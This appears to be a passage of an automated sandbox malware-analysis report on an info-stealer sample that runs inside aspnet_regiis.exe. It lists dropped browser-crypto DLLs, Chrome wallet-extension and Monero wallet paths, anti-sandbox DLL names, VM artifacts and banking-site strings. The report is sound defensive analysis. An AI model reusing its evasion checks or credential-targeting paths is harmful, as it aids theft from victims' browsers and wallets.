                      Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                      Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                      Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                      Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                      Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2672994085.000000003A0B1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2668214599.000000002E1D7000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                      Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, nss3.dll.3.dr
                      Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp
                      Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr

                      Data Obfuscation

                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.be0000.0.unpack JO_E58:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A18950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_02A18950
                      Source: file.exeStatic PE information: section name: JO_E58
                      Source: file.exeStatic PE information: section name:
                      Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                      Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                      Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                      Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                      Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C342CD push esp; ret 0_2_00C34316
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C340DE pushfd ; ret 0_2_00C340E2
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C31EAB push esp; iretd 0_2_00C31EFF
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5DA421 push ecx; ret 0_2_6D5DA434
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A2F142 push ecx; ret 3_2_02A2F155
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1DDB5 push ecx; ret 3_2_02A1DDC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A22D3B push esi; ret 3_2_02A22D3D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA9B536 push ecx; ret 3_2_6CA9B549
                      Source: file.exeStatic PE information: section name: JO_E58 entropy: 7.9994803282182785
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR
                      Source: aspnet_regiis.exeBinary or memory string: DIR_WATCH.DLL
                      Source: aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                      Source: aspnet_regiis.exeBinary or memory string: SBIEDLL.DLL
                      Source: aspnet_regiis.exeBinary or memory string: API_LOG.DLL
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2EB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 4EB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 5540000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 6540000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 6670000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 7670000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 7A20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 8A20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 9A20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_02A0180D
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWindow / User API: threadDelayed 831Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWindow / User API: threadDelayed 1900Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI coverage: 9.1 %
                      Source: C:\Users\user\Desktop\file.exe TID: 3980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A10DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 02A10EEEh3_2_02A10DDB
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5D38ED FindFirstFileExW,0_2_6D5D38ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A15FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A15FD1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_02A0BF4D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A14CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_02A14CC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_02A1543D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A01D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A01D80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0D5C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_02A0B5DF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A09D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A09D1C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A15B0B GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,3_2_02A15B0B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_02A0B93F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_02A0CD37
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A15142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,3_2_02A15142
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A10FBA GetSystemInfo,wsprintfA,3_2_02A10FBA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: Amcache.hve.3.drBinary or memory string: VMware
                      Source: CFBFHI.3.drBinary or memory string: global block list test formVMware20,11696497155
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                      Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware-
                      Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: CFBFHI.3.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                      Source: CFBFHI.3.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                      Source: CFBFHI.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                      Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                      Source: CFBFHI.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                      Source: CFBFHI.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                      Source: CFBFHI.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                      Source: CFBFHI.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: CFBFHI.3.drBinary or memory string: discord.comVMware20,11696497155f
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: CFBFHI.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                      Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                      Source: CFBFHI.3.drBinary or memory string: outlook.office.comVMware20,11696497155s
                      Source: CFBFHI.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                      Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: CFBFHI.3.drBinary or memory string: dev.azure.comVMware20,11696497155j
                      Source: CFBFHI.3.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                      Source: CFBFHI.3.drBinary or memory string: tasks.office.comVMware20,11696497155o
                      Source: CFBFHI.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                      Source: CFBFHI.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<Q'2
                      Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                      Source: CFBFHI.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                      Source: CFBFHI.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: CFBFHI.3.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                      Source: CFBFHI.3.drBinary or memory string: AMC password management pageVMware20,11696497155
                      Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP$
                      Source: CFBFHI.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                      Source: Amcache.hve.3.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                      Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: CFBFHI.3.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                      Source: CFBFHI.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                      Source: CFBFHI.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-74533
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-74517
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-75857
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5D199C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D5D199C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A18950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_02A18950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A014AD mov eax, dword ptr fs:[00000030h]3_2_02A014AD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A014A2 mov eax, dword ptr fs:[00000030h]3_2_02A014A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0148A mov eax, dword ptr fs:[00000030h]3_2_02A0148A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A18599 mov eax, dword ptr fs:[00000030h]3_2_02A18599
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1859A mov eax, dword ptr fs:[00000030h]3_2_02A1859A
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5D5010 GetProcessHeap,0_2_6D5D5010
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5CD4D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6D5CD4D7
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5CDA02 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D5CDA02
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A1D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_02A1D016
